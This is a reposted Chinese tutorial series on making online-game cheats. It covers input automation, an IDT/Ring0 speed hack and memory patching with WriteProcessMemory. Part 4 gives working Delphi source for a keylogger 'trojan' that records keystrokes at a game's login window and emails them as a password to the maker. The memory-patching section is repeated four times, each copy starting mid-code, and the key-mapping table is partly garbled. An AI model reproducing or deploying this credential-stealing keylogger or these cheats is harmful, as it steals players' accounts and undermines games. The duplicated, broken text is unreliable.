网络游戏外挂制作之我所见(系列文档1-5)

2023-11-22 09:59

本文主要是介绍网络游戏外挂制作之我所见(系列文档1-5),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

本技术文档和开发工具均来自Internet,仅交流学习技术使用,请在观看24小时之后,自行忘记内容,如果您喜欢本贴,请支持正版游戏盗版外挂,或请回复顶之,谢谢。 
==================================================
网络游戏外挂制作之我所见(1) 
在几年前我看到别人玩网络游戏用上了外挂,做为程序员的我心里实在是不爽,想搞清楚这到底是怎么回事。就拿了一些来研究,小有心得,拿出来与大家共享,外挂无非就是分几种罢了(依制作难度):
1、动作式,所谓动作式,就是指用API发命令给窗口或API控制鼠标、键盘等,使游戏里的人物进行流动或者攻击,最早以前的“石器”外挂就是这种方式。(这种外挂完全是垃圾,TMD,只要会一点点API的人都知道该怎么做,不过这种外挂也是入门级的好东东,虽然不能提高你的战斗力,但是可以提高你的士气^_^)
2、本地修改式,这种外挂跟传统上的一些游戏修改器没有两样,做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现,“精灵”的外挂这是这种方式写成的,它的难点在于找到那些地址码,找地址一般地要借助于别人的工具,有的游戏还有双码校验,正正找起来会比较困难。(这种外挂,比上一种有一点点难度,但是这种外挂做起来能够用,也是有一定难度的啦~~,这种外挂可以很快提升你对内存地址的理解及应用,是你编程技术提高的好东东)
3、木马式,这种外挂的目的是帮外挂制作者偷到用户的密码(TMD,“烂”就一个字,不过要知已知彼所以还是要谈一下啦~~),做这种外挂有一定的难度,需要HOOK或键盘监视技术做底子,才可以完成,它的原理是先首截了用户的帐号或密码,然后发到指定邮箱。(我以前写过这样的东东,但是从来没有用过,我知道这种东东很不道德,所以以后千万别用呀!~~)
4、加速式,这种外挂可以加快游戏的速度……(对不起大家,这种东东我没有实际做过,所以不能妄自评,惭愧~~)
5、封包式,这种外挂是高难度外挂,需要有很强的编程功力才可以写得出来。它的原理是先截取封包,后修改,再转发(Kao,说起来简单,你做一个试试~~~~)。这种外挂适用于大多数网络游戏,像WPE及一些网络游戏外挂都是用这种方式写成的,编写这种外挂需要apihook技术,winsock技术…………
  这几种外挂之中,前三种可以用VB,DELPHI等语言比较好实现,后两种则要用VC等底层支持比较好的编程工具才好实现。(啪,请听下回分解)
(本人是个程序爱好者并不是专业制作外挂的,所以文中有什么不当请大家海涵,以后的文章,我会依对动作式,本地修改式,木马式,封包式这4种东东的编写过程做详细解说)
 

 

 

上回对五种类型的外挂做了一个大体的概括,大家对这几种外挂都有了一定的了解,现在就依次(制作难度)由浅到深谈谈我对外挂制作的一些认识吧~~~~
首先,先来谈一下动作式的外挂,这也是我第一次写外挂时做的最简单的一种。
记得还在“石器”时代的时候,我看到别人挂着一种软件(外挂)人物就可以四外游走(当时我还不知道外挂怎么回事^_^),于是找了这种软件过来研究(拿来后才听别人说这叫外挂),发现这种东东其实实现起来并不难,仔佃看其实人物的行走无非就是鼠标在不同的地方点来点去而已,看后就有实现这功能的冲动,随后跑到MSDN上看了一些资料,发现这种实现这几个功能,只需要几个简单的API函数就可以搞定:
1、首先我们要知道现在鼠标的位置(为了好还原现在鼠标的位置)所以我们就要用到API函数GetCursorPos,它的使用方法如下:
BOOL GetCursorPos(

 

  LPPOINT lpPoint // address of structure for cursor position 
  );
2、我们把鼠标的位置移到要到人物走到的地方,我们就要用到SetCursorPos函数来移动鼠标位置,它的使用方法如下:
BOOL SetCursorPos(

  int X, // horizontal position 
  int Y // vertical position
  );
3、模拟鼠标发出按下和放开的动作,我们要用到mouse_event函数来实现,具休使用方法用下:
VOID mouse_event(

  DWORD dwFlags, // flags specifying various motion/click variants
  DWORD dx, // horizontal mouse position or position change
  DWORD dy, // vertical mouse position or position change
  DWORD dwData, // amount of wheel movement
  DWORD dwExtraInfo // 32 bits of application-defined information
  );
在它的dwFlags处,可用的事件很多如移动MOUSEEVENTF_MOVE,左键按下MOUSEEVENTF_LEFTDOWN,左键放开MOUSEEVENTF_LEFTUP,具体的东东还是查一下MSDN吧~~~~~
好了,有了以前的知识,我们就可以来看看人物移走是怎么实现的了:

getcursorpos(point);
setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机坐标函数
mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
setcursorpos(point.x,point.y);

看了以上的代码,是不是觉得人物的游走很简单啦~~,举一仿三,还有好多好东东可以用这个技巧实现(我早就说过,TMD,这是垃圾外挂的做法,相信了吧~~~),接下来,再看看游戏里面自动攻击的做法吧(必需游戏中攻击支持快捷键的),道理还是一样的,只是用的API不同罢了~~~,这回我们要用到的是keybd_event函数,其用法如下:
VOID keybd_event(

  BYTE bVk, // virtual-key code
  BYTE bScan, // hardware scan code
  DWORD dwFlags, // flags specifying various function options
  DWORD dwExtraInfo // additional data associated with keystroke
  );
我们还要知道扫描码不可以直接使用,要用函数MapVirtualKey把键值转成扫描码,MapVirtualKey的具体使用方法如下:
UINT MapVirtualKey(

  UINT uCode, // virtual-key code or scan code
  UINT uMapType // translation to perform
  );
好了,比说此快接键是CTRL+A,接下来让我们看看实际代码是怎么写的:

keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);
keybd_event(65,mapvirtualkey(65,0),0,0);
keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);
keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);

首先模拟按下了CTRL键,再模拟按下A键,再模拟放开A键,最后放来CTRL键,这就是一个模拟按快捷键的周期。
(看到这里,差不多对简易外挂有了一定的了解了吧~~~~做一个试试?如果你举一仿三还能有更好的东东出来,这就要看你的领悟能力了~~,不过不要高兴太早这只是才开始,以后还有更复杂的东东等着你呢~~)

 

 

 

网络游戏外挂制作之我所见(4) 
以前介绍过的动作式,本地修改式外挂是真正意义上的外挂,而今天本文要介绍的木马式外挂,可能大多像木马吧,是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在,所以今天不得不说一下(我个人是非常讨厌这类外挂的,请看过本文的朋友不要到处乱用此技术,谢谢合作)。要做此类外挂的程序实现方法很多(比如HOOK,键盘监视等技术),因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库,所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视,这个程序用这种技术来实现比较适合。
  在做程序之前我们必需要了解一下程序的思路:
  1、我们首先知道你想记录游戏的登录窗口名称。
  2、判断登录窗口是否出现。
  3、如果登录窗口出现,就记录键盘。
  4、当窗口关闭时,把记录信息,通过邮件发送到程序设计者的邮箱。
  第一点我就不具体分析了,因为你们比我还要了解你们玩的是什么游戏,登录窗口名称是什么。从第二点开始,我们就开始这类外挂的程序实现之旅:
  那么我们要怎么样判断登录窗口虽否出现呢?其实这个很简单,我们用FindWindow函数就可以很轻松的实现了:
  HWND FindWindow(

 

    LPCTSTR lpClassName, // pointer to class name
    LPCTSTR lpWindowName // pointer to window name
  );
  实际程序实现中,我们要找到'xx'窗口,就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现,那么我们就可以对键盘信息进行记录了。
  先首我们用SetWindowsHookEx设置监视日志,而该函数的用法如下:
HHOOK SetWindowsHookEx(

  int idHook, // type of hook to install
  HOOKPROC lpfn, // address of hook procedure
  HINSTANCE hMod, // handle of application instance
  DWORD dwThreadId // identity of thread to install hook for 
  ); 
  在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数,来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了,具体实现方法为:
hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0); 
  而HOOKPROC里的函数就要复杂一点点:
function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; 
begin 
if findedtitle then   //如果发现窗口后
begin 
if (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等于键盘按下
  hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通过keyhookresult(自定义的函数,主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的)转换消息。
if length(hookkey) > 0 then //如果获得按键名称
begin 
  Write(hookkeyFile,hookkey); //把按键名称写入文本文件
  hookkey := '' 
end; 
end; 
end; 
  以上就是记录键盘的整个过程,简单吧,如果记录完可不要忘记释放呀,UnHookWindowsHookEx(hHook),而hHOOK,就是创建setwindowshookex后所返回的句柄。
  我们已经得到了键盘的记录,那么现在最后只要把记录的这些信息发送回来,我们就大功造成了。其他发送这块并不是很难,只要把记录从文本文件里边读出来,用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下:
  assignfile(ReadFile,'hook.txt'); //打开hook.txt这个文本文件
  reset(ReadFile); //设为读取方式
  try 
  While not Eof(ReadFile) do //当没有读到文件尾
  begin 
  Readln(ReadFile,s,j); //读取文件行
  body:=body+s; 
  end; 
  finally 
  closefile(ReadFile); //关闭文件
  end; 
  nmsmtp1.EncodeType:=uuMime; //设置编码
  nmsmtp1.PostMessage.Attachments.Text:='' //设置附件
  nmsmtp1.PostMessage.FromAddress:=&#39XXX@XXX.com' //设置源邮件地址
  nmsmtp1.PostMessage.ToAddress.Text:=&#39XXX@XXX.com' /设置目标邮件地址
  nmsmtp1.PostMessage.Body.Text:='密码'+' '+body; //设置邮件内容
  nmsmtp1.PostMessage.Subject:='password' //设置邮件标题
  nmsmtp1.SendMail; //发送邮件
  这个程序全部功能已经实现,编编试试~~~对了,我以前写的类似的作品可以在
http://www.playicq.com/上找得到。
  (其实做一个这样的东东也不难,基本也是说不上什么技术可言。希望大看我的文章后不要到处乱应用呀~~~~小生在此有礼了~~~,最后要说的是我最近一段时间很忙,单位里有一堆事情等着我要去做(做项目,做研发,带实习生,过CMM2~~~~累呀),所以第5篇也不得不推后出了,请大家谅解,做为对大家关心的补偿,请大家有什么问题跟贴留言,如果我会,我会一一解答的,谢谢大家对我的文章的关心~~)

附:
function Keyhookresult(lP: integer; wP: integer): pchar; 
begin 
result := '[Print Screen]' 
case lp of 
10688: result := '`' 
561: Result := Ƈ' 
818: result := ƈ' 
1075: result := Ɖ' 
1332: result := Ɗ' 
1589: result := Ƌ' 
1846: result := ƌ' 
2103: result := ƍ' 
2360: result := Ǝ' 
2617: result := Ə' 
2864: result := Ɔ' 
3261: result := '-' 
3515: result := '=' 
4177: result := 'Q' 
4439: result := 'W' 
4677: result := 'E' 
4946: result := 'R' 
5204: result := 'T' 
5465: result := 'Y' 
5717: result := 'U' 
5961: result := 'I' 
6223: result := 'O' 
6480: result := 'P' 
6875: result := '[' 
7133: result := ']' 
11228: result := '/' 
7745: result := 'A' 
8019: result := 'S' 
8260: result := 'D' 
8518: result := 'F' 
8775: result := 'G' 
9032: result := 'H' 
9290: result := 'J' 
9547: result := 'K' 
9804: result := 'L' 
10170: result := '' 
10462: result := '''' 
11354: result := 'Z' 
11608: result := 'X' 
11843: result := 'C' 
12118: result := 'V' 
12354: result := 'B' 
12622: result := 'N' 
12877: result := 'M' 
13244: result := ',' 
13502: result := '.' 
13759: result := '/' 
13840: result := '[Right-Shift]' 
14624: result := '[Space]' 
283: result := '[Esc]' 
15216: result := '[F1]' 
15473: result := '[F2]' 
15730: result := '[F3]' 
15987: result := '[F4]' 
16244: result := '[F5]' 
16501: result := '[F6]' 
16758: result := '[F7]' 
17015: result := '[F8]' 
17272: result := '[F9]' 
17529: result := '[F10]' 
22394: result := '[F11]' 
22651: result := '[F12]' 
10768: Result := '[Left-Shift]' 
14868: result := '[CapsLock]' 
3592: result := '[Backspace]' 
3849: result := '[Tab]' 
7441: 
  if wp > 30000 then 
  result := '[Right-Ctrl]' 
  else 
  result := '[Left-Ctrl]' 
13679: result := '[Num /]' 
17808: result := '[NumLock]' 
300: result := '[Print Screen]' 
18065: result := '[Scroll Lock]' 
17683: result := '[Pause]' 
21088: result := '[Num0]' 
21358: result := '[Num.]' 
20321: result := '[Num1]' 
20578: result := '[Num2]' 
20835: result := '[Num3]' 
19300: result := '[Num4]' 
19557: result := '[Num5]' 
19814: result := '[Num6]' 
18279: result := '[Num7]' 
18536: result := '[Num8]' 
18793: result := '[Num9]' 
19468: result := '[*5*]' 
14186: result := '[Num *]' 
19053: result := '[Num -]' 
20075: result := '[Num +]' 
21037: result := '[Insert]' 
21294: result := '[Delete]' 
18212: result := '[Home]' 
20259: result := '[End]' 
18721: result := '[PageUp]' 
20770: result := '[PageDown]' 
18470: result := '[UP]' 
20520: result := '[DOWN]' 
19237: result := '[LEFT]' 
19751: result := '[RIGHT]' 
7181: result := '[Enter]' 
end; 
end;

 

我一直没有搞懂制作加速外挂是怎么一回事,直到前不久又翻出来了2001年下半期的《程序员合订本》中《“变速齿轮”研究手记》重新回味了一遍,才有了一点点开悟,随后用Delphi重写了一遍,下面我就把我的心得说给大家听听,并且在此感谢《“变速齿轮”研究手记》作者褚瑞大虲给了提示。废话我就不多说了,那就开始神奇的加速型外挂体验之旅吧!
原本我一直以为加速外挂是针对某个游戏而写的,后来发现我这种概念是不对的,所谓加速外挂其实是修改时钟频率达到加速的目的。
以前DOS时代玩过编程的人就会马上想到,这很简单嘛不就是直接修改一下8253寄存器嘛,这在以前DOS时代可能可以行得通,但是windows则不然。windows是一个32位的操作系统,并不是你想改哪就改哪的(微软的东东就是如此霸气,说不给你改就不给你改^_^),但要改也不是不可能,我们可以通过两种方法来实现:第一是写一个硬件驱动来完成,第二是用Ring0来实现(这种方法是CIH的作者陈盈豪首用的,它的原理是修改一下IDE表->创建一个中断门->进入Ring0->调用中断修改向量,但是没有办法只能用ASM汇编来实现这一切*_*,做为高级语言使用者惨啦!),用第一种方法用点麻烦,所以我们在这里就用第二种方法实现吧~~~
在实现之前我们来理一下思路吧:
1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门,修改向量等工作
2、调用这个过程来实现加速功能
好了,现在思路有了,我们就边看代码边讲解吧:
首先我们建立一个过程,这个过程就是本程序的核心部份:
procedure SetRing(value:word); stdcall; 
const ZDH = $03;     // 设一个中断号
var
IDT : array [0..5] of byte; // 保存IDT表
OG : dword;       //存放旧向量
begin
  asm
  push ebx
  sidt IDT             //读入中断描述符表
  mov ebx, dword ptr [IDT+2] //IDT表基地址
  add ebx, 8*ZDH //计算中断在中断描述符表中的位置
  cli               //关中断
  mov dx, word ptr [ebx+6] 
  shl edx, 16d         
  mov dx, word ptr [ebx]   
  mov [OG], edx     
  mov eax, offset @@Ring0   //指向Ring0级代码段
  mov word ptr [ebx], ax     //低16位,保存在1,2位
  shr eax, 16d
  mov word ptr [ebx+6], ax     //高16位,保存在6,7位
  int ZDH         //中断
  mov ebx, dword ptr [IDT+2]   //重新定位
  add ebx, 8*ZDH
  mov edx, [OG]
  mov word ptr [ebx], dx
  shr edx, 16d
  mov word ptr [ebx+6], dx     //恢复被改了的向量
  pop ebx
  jmp @@exitasm //到exitasm处
  @@Ring0:   //Ring0,这个也是最最最核心的东东
    mov al,$34   //写入8253控制寄存器
    out $43,al
    mov ax,value //写入定时值
    out $40,al   //写定时值低位
    mov al,ah
    out $40,al   //写定时值高位
    iretd       //返回
  @@exitasm:
  end;
end;
最核心的东西已经写完了,大部份读者是知其然不知其所以然吧,呵呵,不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于“变速齿轮”的一个东东吧!
先加一个窗口,在窗口上放上一个trackbar控件把其Max设为20,Min设为1,把Position设为10,在这个控件的Change事件里写上:

 

SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));

因为windows默认的值为$1742,所以我们把1742做为基数,又因为值越小越快,反之越慢的原理,所以写了这样一个公式,好了,这就是“变速齿轮”的一个Delphi+ASM版了(只适用于win9X),呵呵,试一下吧,这对你帮助会很大的,呵呵。

 

 

  LPCTSTR lpClassName, // pointer to class name
  LPCTSTR lpWindowName // pointer to window name
  );
  2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID,函数用法如下:
DWORD GetWindowThreadProcessId(

  HWND hWnd, // handle of window
  LPDWORD lpdwProcessId // address of variable for process identifier
  );
  3、得到游戏进程ID后,接下来的事是要以最高权限打开进程,所用到的函数OpenProcess的具体使用方法如下:
HANDLE OpenProcess(

  DWORD dwDesiredAccess, // access flag 
  BOOL bInheritHandle, // handle inheritance flag 
  DWORD dwProcessId // process identifier 
  );
  在dwDesiredAccess之处就是设存取方式的地方,它可设的权限很多,我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以,其他的方式我们可以查一下MSDN。
  4、打开进程后,我们就可以用函数对存内进行操作,在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可(其他的操作方式比如说:ReadProcessMemory等,我在这里就不一一介绍了),我们看一下WriteProcessMemory的用法:
BOOL WriteProcessMemory(

  HANDLE hProcess, // handle to process whose memory is written to 
  LPVOID lpBaseAddress, // address to start writing to 
  LPVOID lpBuffer, // pointer to buffer to write data to
  DWORD nSize, // number of bytes to write
  LPDWORD lpNumberOfBytesWritten // actual number of bytes written 
  );
  5、下面用CloseHandle关闭进程句柄就完成了。
  这就是这类游戏外挂的程序实现部份的方法,好了,有了此方法,我们就有了理性的认识,我们看看实际例子,提升一下我们的感性认识吧,下面就是XX游戏的外挂代码,我们照上面的方法对应去研究一下吧:
const
ResourceOffset: dword = $004219F4;
resource: dword = 3113226621;
ResourceOffset1: dword = $004219F8;
resource1: dword = 1940000000;
ResourceOffset2: dword = $0043FA50;
resource2: dword = 1280185;
ResourceOffset3: dword = $0043FA54;
resource3: dword = 3163064576;
ResourceOffset4: dword = $0043FA58;
resource4: dword = 2298478592;
var
hw: HWND;
pid: dword;
h: THandle;
tt: Cardinal;
begin
hw := FindWindow('XX', nil);
if hw = 0 then
  Exit;
GetWindowThreadProcessId(hw, @pid);
h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if h = 0 then
  Exit;
if flatcheckbox1.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);
end;
if flatcheckbox2.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);
end;
MessageBeep(0);
CloseHandle(h);
close;
  这个游戏是用了多地址对所要提交的数据进行了校验,所以说这类游戏外挂制作并不是很难,最难的是要找到这些地址。
(方法大家已经看清楚了,具体实践就看大家的了,呵呵~~~~~~,不过不要高兴太早,这种网络游戏毕竟占少数,所以我会在以后的文章中对其他类型外挂做详细解说,对了,请跟一下贴子,鼓励一下,不然我真的没有信心写下面的文章了,谢谢) 

 

 

  LPCTSTR lpClassName, // pointer to class name
  LPCTSTR lpWindowName // pointer to window name
  );
  2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID,函数用法如下:
DWORD GetWindowThreadProcessId(

  HWND hWnd, // handle of window
  LPDWORD lpdwProcessId // address of variable for process identifier
  );
  3、得到游戏进程ID后,接下来的事是要以最高权限打开进程,所用到的函数OpenProcess的具体使用方法如下:
HANDLE OpenProcess(

  DWORD dwDesiredAccess, // access flag 
  BOOL bInheritHandle, // handle inheritance flag 
  DWORD dwProcessId // process identifier 
  );
  在dwDesiredAccess之处就是设存取方式的地方,它可设的权限很多,我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以,其他的方式我们可以查一下MSDN。
  4、打开进程后,我们就可以用函数对存内进行操作,在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可(其他的操作方式比如说:ReadProcessMemory等,我在这里就不一一介绍了),我们看一下WriteProcessMemory的用法:
BOOL WriteProcessMemory(

  HANDLE hProcess, // handle to process whose memory is written to 
  LPVOID lpBaseAddress, // address to start writing to 
  LPVOID lpBuffer, // pointer to buffer to write data to
  DWORD nSize, // number of bytes to write
  LPDWORD lpNumberOfBytesWritten // actual number of bytes written 
  );
  5、下面用CloseHandle关闭进程句柄就完成了。
  这就是这类游戏外挂的程序实现部份的方法,好了,有了此方法,我们就有了理性的认识,我们看看实际例子,提升一下我们的感性认识吧,下面就是XX游戏的外挂代码,我们照上面的方法对应去研究一下吧:
const
ResourceOffset: dword = $004219F4;
resource: dword = 3113226621;
ResourceOffset1: dword = $004219F8;
resource1: dword = 1940000000;
ResourceOffset2: dword = $0043FA50;
resource2: dword = 1280185;
ResourceOffset3: dword = $0043FA54;
resource3: dword = 3163064576;
ResourceOffset4: dword = $0043FA58;
resource4: dword = 2298478592;
var
hw: HWND;
pid: dword;
h: THandle;
tt: Cardinal;
begin
hw := FindWindow('XX', nil);
if hw = 0 then
  Exit;
GetWindowThreadProcessId(hw, @pid);
h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if h = 0 then
  Exit;
if flatcheckbox1.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);
end;
if flatcheckbox2.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);
end;
MessageBeep(0);
CloseHandle(h);
close;
  这个游戏是用了多地址对所要提交的数据进行了校验,所以说这类游戏外挂制作并不是很难,最难的是要找到这些地址。
(方法大家已经看清楚了,具体实践就看大家的了,呵呵~~~~~~,不过不要高兴太早,这种网络游戏毕竟占少数,所以我会在以后的文章中对其他类型外挂做详细解说,对了,请跟一下贴子,鼓励一下,不然我真的没有信心写下面的文章了,谢谢) 

 

 

  LPCTSTR lpClassName, // pointer to class name
  LPCTSTR lpWindowName // pointer to window name
  );
  2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID,函数用法如下:
DWORD GetWindowThreadProcessId(

  HWND hWnd, // handle of window
  LPDWORD lpdwProcessId // address of variable for process identifier
  );
  3、得到游戏进程ID后,接下来的事是要以最高权限打开进程,所用到的函数OpenProcess的具体使用方法如下:
HANDLE OpenProcess(

  DWORD dwDesiredAccess, // access flag 
  BOOL bInheritHandle, // handle inheritance flag 
  DWORD dwProcessId // process identifier 
  );
  在dwDesiredAccess之处就是设存取方式的地方,它可设的权限很多,我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以,其他的方式我们可以查一下MSDN。
  4、打开进程后,我们就可以用函数对存内进行操作,在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可(其他的操作方式比如说:ReadProcessMemory等,我在这里就不一一介绍了),我们看一下WriteProcessMemory的用法:
BOOL WriteProcessMemory(

  HANDLE hProcess, // handle to process whose memory is written to 
  LPVOID lpBaseAddress, // address to start writing to 
  LPVOID lpBuffer, // pointer to buffer to write data to
  DWORD nSize, // number of bytes to write
  LPDWORD lpNumberOfBytesWritten // actual number of bytes written 
  );
  5、下面用CloseHandle关闭进程句柄就完成了。
  这就是这类游戏外挂的程序实现部份的方法,好了,有了此方法,我们就有了理性的认识,我们看看实际例子,提升一下我们的感性认识吧,下面就是XX游戏的外挂代码,我们照上面的方法对应去研究一下吧:
const
ResourceOffset: dword = $004219F4;
resource: dword = 3113226621;
ResourceOffset1: dword = $004219F8;
resource1: dword = 1940000000;
ResourceOffset2: dword = $0043FA50;
resource2: dword = 1280185;
ResourceOffset3: dword = $0043FA54;
resource3: dword = 3163064576;
ResourceOffset4: dword = $0043FA58;
resource4: dword = 2298478592;
var
hw: HWND;
pid: dword;
h: THandle;
tt: Cardinal;
begin
hw := FindWindow('XX', nil);
if hw = 0 then
  Exit;
GetWindowThreadProcessId(hw, @pid);
h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if h = 0 then
  Exit;
if flatcheckbox1.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);
end;
if flatcheckbox2.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);
end;
MessageBeep(0);
CloseHandle(h);
close;
  这个游戏是用了多地址对所要提交的数据进行了校验,所以说这类游戏外挂制作并不是很难,最难的是要找到这些地址。
(方法大家已经看清楚了,具体实践就看大家的了,呵呵~~~~~~,不过不要高兴太早,这种网络游戏毕竟占少数,所以我会在以后的文章中对其他类型外挂做详细解说,对了,请跟一下贴子,鼓励一下,不然我真的没有信心写下面的文章了,谢谢) 

 

 

  LPCTSTR lpClassName, // pointer to class name
  LPCTSTR lpWindowName // pointer to window name
  );
  2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID,函数用法如下:
DWORD GetWindowThreadProcessId(

  HWND hWnd, // handle of window
  LPDWORD lpdwProcessId // address of variable for process identifier
  );
  3、得到游戏进程ID后,接下来的事是要以最高权限打开进程,所用到的函数OpenProcess的具体使用方法如下:
HANDLE OpenProcess(

  DWORD dwDesiredAccess, // access flag 
  BOOL bInheritHandle, // handle inheritance flag 
  DWORD dwProcessId // process identifier 
  );
  在dwDesiredAccess之处就是设存取方式的地方,它可设的权限很多,我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以,其他的方式我们可以查一下MSDN。
  4、打开进程后,我们就可以用函数对存内进行操作,在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可(其他的操作方式比如说:ReadProcessMemory等,我在这里就不一一介绍了),我们看一下WriteProcessMemory的用法:
BOOL WriteProcessMemory(

  HANDLE hProcess, // handle to process whose memory is written to 
  LPVOID lpBaseAddress, // address to start writing to 
  LPVOID lpBuffer, // pointer to buffer to write data to
  DWORD nSize, // number of bytes to write
  LPDWORD lpNumberOfBytesWritten // actual number of bytes written 
  );
  5、下面用CloseHandle关闭进程句柄就完成了。
  这就是这类游戏外挂的程序实现部份的方法,好了,有了此方法,我们就有了理性的认识,我们看看实际例子,提升一下我们的感性认识吧,下面就是XX游戏的外挂代码,我们照上面的方法对应去研究一下吧:
const
ResourceOffset: dword = $004219F4;
resource: dword = 3113226621;
ResourceOffset1: dword = $004219F8;
resource1: dword = 1940000000;
ResourceOffset2: dword = $0043FA50;
resource2: dword = 1280185;
ResourceOffset3: dword = $0043FA54;
resource3: dword = 3163064576;
ResourceOffset4: dword = $0043FA58;
resource4: dword = 2298478592;
var
hw: HWND;
pid: dword;
h: THandle;
tt: Cardinal;
begin
hw := FindWindow('XX', nil);
if hw = 0 then
  Exit;
GetWindowThreadProcessId(hw, @pid);
h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if h = 0 then
  Exit;
if flatcheckbox1.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);
end;
if flatcheckbox2.Checked=true then
begin
  WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);
  WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);
end;
MessageBeep(0);
CloseHandle(h);
close;
  这个游戏是用了多地址对所要提交的数据进行了校验,所以说这类游戏外挂制作并不是很难,最难的是要找到这些地址。
(方法大家已经看清楚了,具体实践就看大家的了,呵呵~~~~~~,不过不要高兴太早,这种网络游戏毕竟占少数,所以我会在以后的文章中对其他类型外挂做详细解说,对了,请跟一下贴子,鼓励一下,不然我真的没有信心写下面的文章了,谢谢) 

这篇关于网络游戏外挂制作之我所见(系列文档1-5)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/409324

相关文章

SpringBoot3集成swagger文档的使用方法

《SpringBoot3集成swagger文档的使用方法》本文介绍了Swagger的诞生背景、主要功能以及如何在SpringBoot3中集成Swagger文档,Swagger可以帮助自动生成API文档... 目录一、前言1. API 文档自动生成2. 交互式 API 测试3. API 设计和开发协作二、使用

使用Python制作一个PDF批量加密工具

《使用Python制作一个PDF批量加密工具》PDF批量加密‌是一种保护PDF文件安全性的方法,通过为多个PDF文件设置相同的密码,防止未经授权的用户访问这些文件,下面我们来看看如何使用Python制... 目录1.简介2.运行效果3.相关源码1.简介一个python写的PDF批量加密工具。PDF批量加密

基于C#实现将图片转换为PDF文档

《基于C#实现将图片转换为PDF文档》将图片(JPG、PNG)转换为PDF文件可以帮助我们更好地保存和分享图片,所以本文将介绍如何使用C#将JPG/PNG图片转换为PDF文档,需要的可以参考下... 目录介绍C# 将单张图片转换为PDF文档C# 将多张图片转换到一个PDF文档介绍将图片(JPG、PNG)转

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

活用c4d官方开发文档查询代码

